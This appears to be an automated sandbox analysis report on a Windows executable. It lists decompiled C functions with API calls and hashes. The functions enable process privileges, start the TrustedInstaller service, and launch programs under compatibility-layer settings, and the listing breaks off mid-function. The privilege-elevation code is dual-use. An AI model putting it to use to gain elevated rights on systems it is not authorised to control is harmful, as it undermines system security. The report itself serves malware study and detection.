                                                                                      Function 00408FC9, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 63libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00408FC9(struct HINSTANCE__** __eax, void* __eflags, WCHAR* _a4) {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* __esi;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t18;
				long _t19;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t24;
				struct HINSTANCE__** _t35;
				void* _t37;

				_t37 = __eflags;
				_t35 = __eax;
				if(E00408F92(_t35, _t37, GetCurrentProcess(), 0x28,  &_v8) == 0) {
					return GetLastError();
				}
				_t16 = E00408F72(_t35);
				__eflags = _t16;
				if(_t16 != 0) {
					_t24 = GetProcAddress( *_t35, "LookupPrivilegeValueW");
					__eflags = _t24;
					if(_t24 != 0) {
						LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
					}
				}
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				_a4 = _v8;
				_t18 = E00408F72(_t35);
				__eflags = _t18;
				if(_t18 != 0) {
					_t22 = GetProcAddress( *_t35, "AdjustTokenPrivileges");
					__eflags = _t22;
					if(_t22 != 0) {
						AdjustTokenPrivileges(_a4, 0,  &_v24, 0, 0, 0); // executed
					}
				}
				_t19 = GetLastError();
				FindCloseChangeNotification(_v8); // executed
				return _t19;
			}














                                                                                      0x00408fc9
                                                                                      0x00408fd0
                                                                                      0x00408fe8
                                                                                      0x00000000
                                                                                      0x00408fea
                                                                                      0x00408ff4
                                                                                      0x00409001
                                                                                      0x00409003
                                                                                      0x0040900c
                                                                                      0x0040900e
                                                                                      0x00409010
                                                                                      0x0040901a
                                                                                      0x0040901a
                                                                                      0x00409010
                                                                                      0x0040901f
                                                                                      0x00409026
                                                                                      0x0040902d
                                                                                      0x00409030
                                                                                      0x00409035
                                                                                      0x00409037
                                                                                      0x00409040
                                                                                      0x00409042
                                                                                      0x00409044
                                                                                      0x00409051
                                                                                      0x00409051
                                                                                      0x00409044
                                                                                      0x00409053
                                                                                      0x0040905e
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                        • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                      • GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                      • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueW), ref: 0040900C
                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0040901A
                                                                                      • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 00409040
                                                                                      • AdjustTokenPrivileges.KERNELBASE(00000002,00000000,00000001,00000000,00000000,00000000), ref: 00409051
                                                                                      • GetLastError.KERNEL32(00000000,00000000,00000000), ref: 00409053
                                                                                      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040905E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: AddressProc$ErrorLast$AdjustChangeCloseCurrentFindLookupNotificationPrivilegePrivilegesProcessTokenValue
                                                                                      • String ID: AdjustTokenPrivileges$LookupPrivilegeValueW
                                                                                      • API String ID: 616250965-1253513912
                                                                                      • Opcode ID: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                      • Instruction ID: 03a5dc6c67e2a3af6dad2eaf9b7d3d3c38ee31464385454108c093b6d6cde588
                                                                                      • Opcode Fuzzy Hash: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                      • Instruction Fuzzy Hash: 34114F72500105FFEB10AFF4DD859AF76ADAB44384B10413AF541F2192DA789E449B68
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401306, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38serviceCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00401306(void* _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				void* _t5;
				int _t12;
				void* _t14;

				_t12 = 0; // executed
				_t5 = OpenServiceW(_a4, L"TrustedInstaller", 0x34); // executed
				_t14 = _t5;
				if(_t14 != 0) {
					if(QueryServiceStatus(_t14,  &_v32) != 0 && _v28 != 4) {
						_t12 = StartServiceW(_t14, 0, 0);
					}
					CloseServiceHandle(_t14);
				}
				CloseServiceHandle(_a4);
				return _t12;
			}








                                                                                      0x00401319
                                                                                      0x0040131b
                                                                                      0x00401327
                                                                                      0x0040132b
                                                                                      0x0040133a
                                                                                      0x0040134b
                                                                                      0x0040134b
                                                                                      0x0040134e
                                                                                      0x0040134e
                                                                                      0x00401353
                                                                                      0x0040135b

                                                                                      APIs
                                                                                      • OpenServiceW.ADVAPI32(00402183,TrustedInstaller,00000034,?,?,00000000,?,?,?,?,?,00402183,00000000), ref: 0040131B
                                                                                      • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00402183,00000000), ref: 00401332
                                                                                      • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00401345
                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00402183,00000000), ref: 0040134E
                                                                                      • CloseServiceHandle.ADVAPI32(00402183,?,?,?,?,?,00402183,00000000), ref: 00401353
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: Service$CloseHandle$OpenQueryStartStatus
                                                                                      • String ID: TrustedInstaller
                                                                                      • API String ID: 862991418-565535830
                                                                                      • Opcode ID: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                      • Instruction ID: 300c39592a487ff017dde1f9aaf4b69bffecac74e3568357a1b40912e0f2caec
                                                                                      • Opcode Fuzzy Hash: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                      • Instruction Fuzzy Hash: F9F08275601218FBE7222BE59CC8DAF7A6CDF88794B040132FD01B12A0D674DD05C9F9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040A33B, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E0040A33B(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				signed int _t18;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				struct HRSRC__* _t35;
				signed int _t36;

				_t12 = FindResourceW(_a4, _a12, _a8); // executed
				_t35 = _t12;
				if(_t35 != 0) {
					_t33 = SizeofResource(_a4, _t35);
					if(_t33 > 0) {
						_t16 = LoadResource(_a4, _t35);
						if(_t16 != 0) {
							_t17 = LockResource(_t16);
							if(_t17 != 0) {
								_a4 = _t33;
								_t29 = _t33 * _t33;
								_t36 = 0;
								_t7 =  &_a4;
								 *_t7 = _a4 >> 2;
								if( *_t7 != 0) {
									do {
										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
										_t36 = _t36 + 1;
										_t29 = _t26;
									} while (_t36 < _a4);
								}
								_t18 =  *0x40fa70; // 0xfcb617dc
								 *0x40fa70 = _t18 + _t29 ^ _t33;
							}
						}
					}
				}
				return 1;
			}












                                                                                      0x0040a348
                                                                                      0x0040a34e
                                                                                      0x0040a352
                                                                                      0x0040a35f
                                                                                      0x0040a363
                                                                                      0x0040a369
                                                                                      0x0040a371
                                                                                      0x0040a374
                                                                                      0x0040a37c
                                                                                      0x0040a380
                                                                                      0x0040a383
                                                                                      0x0040a386
                                                                                      0x0040a388
                                                                                      0x0040a388
                                                                                      0x0040a38c
                                                                                      0x0040a38f
                                                                                      0x0040a39f
                                                                                      0x0040a3a1
                                                                                      0x0040a3a5
                                                                                      0x0040a3a5
                                                                                      0x0040a3a9
                                                                                      0x0040a3aa
                                                                                      0x0040a3b3
                                                                                      0x0040a3b3
                                                                                      0x0040a37c
                                                                                      0x0040a371
                                                                                      0x0040a3b8
                                                                                      0x0040a3be

                                                                                      APIs
                                                                                      • FindResourceW.KERNELBASE(?,?,?), ref: 0040A348
                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 0040A359
                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 0040A369
                                                                                      • LockResource.KERNEL32(00000000), ref: 0040A374
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                      • String ID:
                                                                                      • API String ID: 3473537107-0
                                                                                      • Opcode ID: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                      • Instruction ID: cffa73b79ff672a66ed03b266e9253c2cf49bd0e4e2f0a3a12bdb4b298abf715
                                                                                      • Opcode Fuzzy Hash: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                      • Instruction Fuzzy Hash: 1101C032700315ABCB194FA5DD8995BBFAEFB852913088036ED09EA2A1D730C811CA88
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004022D5, Relevance: 61.7, APIs: 25, Strings: 10, Instructions: 435COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 83%
                                                                                      			E004022D5(void* __ecx, void* __edx, void* __eflags, long _a4, long _a8) {
				WCHAR* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				char* _v24;
				int _v28;
				intOrPtr _v32;
				int _v36;
				int _v40;
				char _v44;
				void* _v56;
				int _v60;
				char _v92;
				void _v122;
				int _v124;
				short _v148;
				signed int _v152;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				void _v192;
				char _v196;
				char _v228;
				void _v258;
				int _v260;
				void _v786;
				short _v788;
				void _v1314;
				short _v1316;
				void _v1842;
				short _v1844;
				void _v18234;
				short _v18236;
				char _v83772;
				void* __ebx;
				void* __edi;
				void* __esi;
				short* _t174;
				short _t175;
				signed int _t176;
				short _t177;
				short _t178;
				int _t184;
				signed int _t187;
				intOrPtr _t207;
				intOrPtr _t219;
				int* _t252;
				int* _t253;
				int* _t266;
				int* _t267;
				wchar_t* _t270;
				int _t286;
				void* _t292;
				void* _t304;
				WCHAR* _t308;
				WCHAR* _t310;
				intOrPtr* _t311;
				int _t312;
				WCHAR* _t315;
				void* _t325;
				void* _t328;

				_t304 = __edx;
				E0040B550(0x1473c, __ecx);
				_t286 = 0;
				 *_a4 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				memset( &_v192, 0, 0x40);
				_v60 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 = 0;
				_v40 = 0;
				_v28 = 0;
				_v36 = 0;
				_v32 = 0x100;
				_v44 = 0;
				_v1316 = 0;
				memset( &_v1314, 0, 0x208);
				_v788 = 0;
				memset( &_v786, 0, 0x208);
				_t315 = _a8;
				_t328 = _t325 + 0x24;
				_v83772 = 0;
				_v196 = 0x44;
				E00404923(0x104,  &_v788, _t315);
				if(wcschr(_t315, 0x25) != 0) {
					ExpandEnvironmentStringsW(_t315,  &_v788, 0x104);
				}
				if(_t315[0x2668] != _t286 && wcschr( &_v788, 0x5c) == 0) {
					_v8 = _t286;
					_v1844 = _t286;
					memset( &_v1842, _t286, 0x208);
					_t328 = _t328 + 0xc;
					SearchPathW(_t286,  &_v788, _t286, 0x104,  &_v1844,  &_v8);
					if(_v1844 != _t286) {
						E00404923(0x104,  &_v788,  &_v1844);
					}
				}
				_t308 =  &(_t315[0x2106]);
				if( *_t308 == _t286) {
					E00404B5C( &_v1316,  &_v788);
					__eflags = _v1316 - _t286;
					_t315 = _a8;
					_pop(_t292);
					if(_v1316 == _t286) {
						goto L11;
					}
					goto L10;
				} else {
					_v20 = _t308;
					_t270 = wcschr(_t308, 0x25);
					_pop(_t292);
					if(_t270 == 0) {
						L11:
						_t174 =  &(_t315[0x220e]);
						if( *_t174 != 1) {
							_v152 = _v152 | 0x00000001;
							_v148 =  *_t174;
						}
						_t309 = ",";
						if(_t315[0x2210] != _t286 && _t315[0x2212] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2212]), _t292,  &_v260, 0x1f,  &_v8, ",");
							E004052F3( &(_t315[0x2212]), _t292,  &_v124, 0x1f,  &_v8, ",");
							_v152 = _v152 | 0x00000004;
							_t266 =  &_v260;
							_push(_t266);
							L0040B1F8();
							_v180 = _t266;
							_t328 = _t328 + 0x3c;
							_t267 =  &_v124;
							L0040B1F8();
							_t292 = _t267;
							_v176 = _t267;
						}
						if(_t315[0x2232] != _t286 && _t315[0x2234] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2234]), _t292,  &_v260, 0x1f,  &_v8, _t309);
							E004052F3( &(_t315[0x2234]), _t292,  &_v124, 0x1f,  &_v8, _t309);
							_v152 = _v152 | 0x00000002;
							_t252 =  &_v260;
							_push(_t252);
							L0040B1F8();
							_v172 = _t252;
							_t328 = _t328 + 0x3c;
							_t253 =  &_v124;
							_push(_t253);
							L0040B1F8();
							_v168 = _t253;
						}
						_t310 =  &(_t315[0x105]);
						if( *_t310 != _t286) {
							if(_t315[0x266a] == _t286 || wcschr(_t310, 0x25) == 0) {
								_push(_t310);
							} else {
								_v18236 = _t286;
								memset( &_v18234, _t286, 0x4000);
								_t328 = _t328 + 0xc;
								ExpandEnvironmentStringsW(_t310,  &_v18236, 0x2000);
								_push( &_v18236);
							}
							_push( &_v788);
							_push(L"\"%s\" %s");
							_push(0x7fff);
							_push( &_v83772);
							L0040B1EC();
							_v24 =  &_v83772;
						}
						_t175 = _t315[0x220c];
						if(_t175 != 0x20) {
							_v12 = _t175;
						}
						_t311 = _a4;
						if(_t315[0x2254] == 2) {
							E00401D1E(_t311, L"RunAsInvoker");
						}
						_t176 = _t315[0x265c];
						if(_t176 != _t286 && _t176 - 1 <= 0xc) {
							E00401D1E(_t311,  *((intOrPtr*)(0x40f2a0 + _t176 * 4)));
						}
						_t177 = _t315[0x265e];
						if(_t177 != 1) {
							__eflags = _t177 - 2;
							if(_t177 != 2) {
								goto L37;
							}
							_push(L"16BITCOLOR");
							goto L36;
						} else {
							_push(L"256COLOR");
							L36:
							E00401D1E(_t311);
							L37:
							if(_t315[0x2660] == _t286) {
								__eflags = _t315[0x2662] - _t286;
								if(_t315[0x2662] == _t286) {
									__eflags = _t315[0x2664] - _t286;
									if(_t315[0x2664] == _t286) {
										__eflags = _t315[0x2666] - _t286;
										if(_t315[0x2666] == _t286) {
											L46:
											_t178 = _t315[0x2a6e];
											_t358 = _t178 - 3;
											if(_t178 != 3) {
												__eflags = _t178 - 2;
												if(_t178 != 2) {
													__eflags =  *_t311 - _t286;
													if( *_t311 == _t286) {
														_push(_t286);
													} else {
														_push(_t311);
													}
													SetEnvironmentVariableW(L"__COMPAT_LAYER", ??);
													L63:
													_t293 = _t311;
													_t184 = E00401FE6(_t315, _t311, _t304,  &_v788, _v24, _v12, _v16, _v20,  &_v196,  &_v60); // executed
													_t312 = _t184;
													if(_t312 == _t286 && _v60 != _t286) {
														_t363 = _t315[0x266c] - _t286;
														if(_t315[0x266c] != _t286) {
															_t187 = E00401A3F(_t293, _t363,  &(_t315[0x266e]));
															_a4 = _a4 | 0xffffffff;
															_a8 = _t286;
															GetProcessAffinityMask(_v60,  &_a8,  &_a4);
															_t184 = SetProcessAffinityMask(_v60, _a4 & _t187);
														}
													}
													E004055D1(_t184,  &_v44);
													return _t312;
												}
												E00405497( &_v92);
												E00405497( &_v228);
												E0040149F(__eflags,  &_v92);
												E0040135C(E004055EC( &(_t315[0x2a70])), __eflags,  &_v228);
												E00401551( &_v228, _t304, __eflags,  &_v92);
												_t204 = _a4;
												__eflags =  *_a4;
												if(__eflags != 0) {
													E004014E9( &_v92, _t304, __eflags,  &_v92, _t204);
												}
												E00401421( &_v44, _t304,  &_v92, __eflags);
												_t207 = _v28;
												__eflags = _t207;
												_v16 = 0x40c4e8;
												if(_t207 != 0) {
													_v16 = _t207;
												}
												_v12 = _v12 | 0x00000400;
												E004054B9( &_v228);
												E004054B9( &_v92);
												_t286 = 0;
												__eflags = 0;
												L58:
												_t315 = _a8;
												_t311 = _a4;
												goto L63;
											}
											E00405497( &_v92);
											E0040135C(E004055EC( &(_t315[0x2a70])), _t358,  &_v92);
											_t359 =  *_t311 - _t286;
											if( *_t311 != _t286) {
												E004014E9( &_v92, _t304, _t359,  &_v92, _t311);
											}
											E00401421( &_v44, _t304,  &_v92, _t359);
											_t219 = _v28;
											_v16 = 0x40c4e8;
											if(_t219 != _t286) {
												_v16 = _t219;
											}
											_v12 = _v12 | 0x00000400;
											E004054B9( &_v92);
											goto L58;
										}
										_push(L"HIGHDPIAWARE");
										L45:
										E00401D1E(_t311);
										goto L46;
									}
									_push(L"DISABLEDWM");
									goto L45;
								}
								_push(L"DISABLETHEMES");
								goto L45;
							}
							_push(L"640X480");
							goto L45;
						}
					}
					ExpandEnvironmentStringsW(_t308,  &_v1316, 0x104);
					L10:
					_v20 =  &_v1316;
					goto L11;
				}
			}

































































                                                                                      0x004022d5
                                                                                      0x004022dd
                                                                                      0x004022e7
                                                                                      0x004022ec
                                                                                      0x004022f7
                                                                                      0x004022fa
                                                                                      0x004022fd
                                                                                      0x00402300
                                                                                      0x00402307
                                                                                      0x0040230d
                                                                                      0x0040230e
                                                                                      0x00402318
                                                                                      0x00402321
                                                                                      0x00402324
                                                                                      0x00402327
                                                                                      0x0040232a
                                                                                      0x0040232d
                                                                                      0x00402334
                                                                                      0x00402337
                                                                                      0x0040233e
                                                                                      0x0040234f
                                                                                      0x00402356
                                                                                      0x0040235b
                                                                                      0x0040235e
                                                                                      0x0040236d
                                                                                      0x00402374
                                                                                      0x0040237e
                                                                                      0x00402395
                                                                                      0x004023a0
                                                                                      0x004023a0
                                                                                      0x004023ac
                                                                                      0x004023cf
                                                                                      0x004023d2
                                                                                      0x004023d9
                                                                                      0x004023de
                                                                                      0x004023f6
                                                                                      0x00402403
                                                                                      0x00402414
                                                                                      0x00402419
                                                                                      0x00402403
                                                                                      0x0040241a
                                                                                      0x00402423
                                                                                      0x00402458
                                                                                      0x0040245d
                                                                                      0x00402464
                                                                                      0x00402467
                                                                                      0x00402468
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00402425
                                                                                      0x00402428
                                                                                      0x0040242b
                                                                                      0x00402433
                                                                                      0x00402434
                                                                                      0x00402473
                                                                                      0x00402473
                                                                                      0x0040247c
                                                                                      0x00402481
                                                                                      0x00402488
                                                                                      0x00402488
                                                                                      0x00402495
                                                                                      0x0040249a
                                                                                      0x004024b7
                                                                                      0x004024be
                                                                                      0x004024cd
                                                                                      0x004024d1
                                                                                      0x004024ed
                                                                                      0x004024f0
                                                                                      0x00402506
                                                                                      0x0040250b
                                                                                      0x00402512
                                                                                      0x00402518
                                                                                      0x00402519
                                                                                      0x0040251e
                                                                                      0x00402524
                                                                                      0x00402527
                                                                                      0x0040252b
                                                                                      0x00402530
                                                                                      0x00402531
                                                                                      0x00402531
                                                                                      0x0040253d
                                                                                      0x0040255a
                                                                                      0x00402561
                                                                                      0x00402570
                                                                                      0x00402574
                                                                                      0x00402590
                                                                                      0x00402593
                                                                                      0x004025a9
                                                                                      0x004025ae
                                                                                      0x004025b5
                                                                                      0x004025bb
                                                                                      0x004025bc
                                                                                      0x004025c1
                                                                                      0x004025c7
                                                                                      0x004025ca
                                                                                      0x004025cd
                                                                                      0x004025ce
                                                                                      0x004025d4
                                                                                      0x004025d4
                                                                                      0x004025da
                                                                                      0x004025e3
                                                                                      0x004025eb
                                                                                      0x00402633
                                                                                      0x004025fb
                                                                                      0x00402608
                                                                                      0x0040260f
                                                                                      0x00402614
                                                                                      0x00402624
                                                                                      0x00402630
                                                                                      0x00402630
                                                                                      0x0040263a
                                                                                      0x0040263b
                                                                                      0x00402646
                                                                                      0x0040264b
                                                                                      0x0040264c
                                                                                      0x0040265a
                                                                                      0x0040265a
                                                                                      0x0040265d
                                                                                      0x00402666
                                                                                      0x00402668
                                                                                      0x00402668
                                                                                      0x00402672
                                                                                      0x00402675
                                                                                      0x0040267e
                                                                                      0x0040267e
                                                                                      0x00402683
                                                                                      0x0040268b
                                                                                      0x0040269e
                                                                                      0x0040269e
                                                                                      0x004026a3
                                                                                      0x004026ac
                                                                                      0x004026b5
                                                                                      0x004026b8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004026ba
                                                                                      0x00000000
                                                                                      0x004026ae
                                                                                      0x004026ae
                                                                                      0x004026bf
                                                                                      0x004026c1
                                                                                      0x004026c6
                                                                                      0x004026cc
                                                                                      0x004026d5
                                                                                      0x004026db
                                                                                      0x004026e4
                                                                                      0x004026ea
                                                                                      0x004026f3
                                                                                      0x004026f9
                                                                                      0x00402707
                                                                                      0x00402707
                                                                                      0x0040270d
                                                                                      0x00402710
                                                                                      0x0040276d
                                                                                      0x00402770
                                                                                      0x0040280b
                                                                                      0x0040280e
                                                                                      0x00402813
                                                                                      0x00402810
                                                                                      0x00402810
                                                                                      0x00402810
                                                                                      0x00402819
                                                                                      0x0040281f
                                                                                      0x00402836
                                                                                      0x00402841
                                                                                      0x00402846
                                                                                      0x0040284a
                                                                                      0x00402851
                                                                                      0x00402857
                                                                                      0x00402860
                                                                                      0x00402865
                                                                                      0x00402876
                                                                                      0x00402879
                                                                                      0x00402888
                                                                                      0x00402888
                                                                                      0x00402857
                                                                                      0x00402891
                                                                                      0x0040289c
                                                                                      0x0040289c
                                                                                      0x00402779
                                                                                      0x00402784
                                                                                      0x0040278d
                                                                                      0x004027a4
                                                                                      0x004027b3
                                                                                      0x004027b8
                                                                                      0x004027bb
                                                                                      0x004027bf
                                                                                      0x004027c6
                                                                                      0x004027c6
                                                                                      0x004027d1
                                                                                      0x004027d6
                                                                                      0x004027d9
                                                                                      0x004027db
                                                                                      0x004027e2
                                                                                      0x004027e4
                                                                                      0x004027e4
                                                                                      0x004027e7
                                                                                      0x004027f4
                                                                                      0x004027fc
                                                                                      0x00402801
                                                                                      0x00402801
                                                                                      0x00402803
                                                                                      0x00402803
                                                                                      0x00402806
                                                                                      0x00000000
                                                                                      0x00402806
                                                                                      0x00402715
                                                                                      0x00402729
                                                                                      0x0040272e
                                                                                      0x00402731
                                                                                      0x00402738
                                                                                      0x00402738
                                                                                      0x00402743
                                                                                      0x00402748
                                                                                      0x0040274d
                                                                                      0x00402754
                                                                                      0x00402756
                                                                                      0x00402756
                                                                                      0x00402759
                                                                                      0x00402763
                                                                                      0x00000000
                                                                                      0x00402763
                                                                                      0x004026fb
                                                                                      0x00402700
                                                                                      0x00402702
                                                                                      0x00000000
                                                                                      0x00402702
                                                                                      0x004026ec
                                                                                      0x00000000
                                                                                      0x004026ec
                                                                                      0x004026dd
                                                                                      0x00000000
                                                                                      0x004026dd
                                                                                      0x004026ce
                                                                                      0x00000000
                                                                                      0x004026ce
                                                                                      0x004026ac
                                                                                      0x00402443
                                                                                      0x0040246a
                                                                                      0x00402470
                                                                                      0x00000000
                                                                                      0x00402470

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00402300
                                                                                      • memset.MSVCRT ref: 0040233E
                                                                                      • memset.MSVCRT ref: 00402356
                                                                                        • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                        • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                      • wcschr.MSVCRT ref: 00402387
                                                                                      • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004023A0
                                                                                        • Part of subcall function 00404B5C: wcscpy.MSVCRT ref: 00404B61
                                                                                        • Part of subcall function 00404B5C: wcsrchr.MSVCRT ref: 00404B69
                                                                                      • wcschr.MSVCRT ref: 004023B7
                                                                                      • memset.MSVCRT ref: 004023D9
                                                                                      • SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00000208), ref: 004023F6
                                                                                      • wcschr.MSVCRT ref: 0040242B
                                                                                      • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00402443
                                                                                      • memset.MSVCRT ref: 004024BE
                                                                                      • memset.MSVCRT ref: 004024D1
                                                                                      • _wtoi.MSVCRT ref: 00402519
                                                                                      • _wtoi.MSVCRT ref: 0040252B
                                                                                      • memset.MSVCRT ref: 00402561
                                                                                      • memset.MSVCRT ref: 00402574
                                                                                      • _wtoi.MSVCRT ref: 004025BC
                                                                                      • _wtoi.MSVCRT ref: 004025CE
                                                                                      • wcschr.MSVCRT ref: 004025F0
                                                                                      • memset.MSVCRT ref: 0040260F
                                                                                      • ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,?,?,?,?,?,?,?,00000208), ref: 00402624
                                                                                      • _snwprintf.MSVCRT ref: 0040264C
                                                                                      • SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,00000000), ref: 00402819
                                                                                      • GetProcessAffinityMask.KERNEL32(?,?,000000FF), ref: 00402879
                                                                                      • SetProcessAffinityMask.KERNEL32(?,000000FF), ref: 00402888
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: memset$Environment_wtoiwcschr$ExpandStrings$AffinityMaskProcess$PathSearchVariable_snwprintfmemcpywcscpywcslenwcsrchr
                                                                                      • String ID: "%s" %s$16BITCOLOR$256COLOR$640X480$D$DISABLEDWM$DISABLETHEMES$HIGHDPIAWARE$RunAsInvoker$__COMPAT_LAYER
                                                                                      • API String ID: 2452314994-435178042
                                                                                      • Opcode ID: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                      • Instruction ID: b54a7db1e05dda42e7bfc3830e2036fe484084dd7c1f23c6c807eede0ded9d8d
                                                                                      • Opcode Fuzzy Hash: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                      • Instruction Fuzzy Hash: 03F14F72900218AADB20EFA5CD85ADEB7B8EF04304F1045BBE619B71D1D7789A84CF59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00408533, Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 259COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 89%
                                                                                      			E00408533(void* __ecx, void* __edx, void* __eflags, char _a8, intOrPtr _a12, char _a32, WCHAR* _a40, WCHAR* _a44, intOrPtr _a48, WCHAR* _a52, WCHAR* _a56, char _a60, int _a64, char* _a68, int _a72, char _a76, int _a80, char* _a84, int _a88, long _a92, void _a94, long _a620, void _a622, char _a1132, char _a1148, WCHAR* _a3196, WCHAR* _a3200, WCHAR* _a3204, WCHAR* _a3208, void* _a3212, char _a3216, int _a5264, int _a5268, int _a5272, int _a5276, int _a5280, char _a5288, char _a5292, int _a7340, int _a7344, int _a7348, int _a7352, int _a7356) {
				char _v0;
				WCHAR* _v4;
				void* __edi;
				void* __esi;
				void* _t76;
				void* _t82;
				wchar_t* _t85;
				void* _t86;
				void* _t87;
				intOrPtr _t92;
				wchar_t* _t93;
				intOrPtr _t95;
				int _t106;
				char* _t110;
				intOrPtr _t115;
				wchar_t* _t117;
				intOrPtr _t124;
				wchar_t* _t125;
				intOrPtr _t131;
				wchar_t* _t132;
				int _t156;
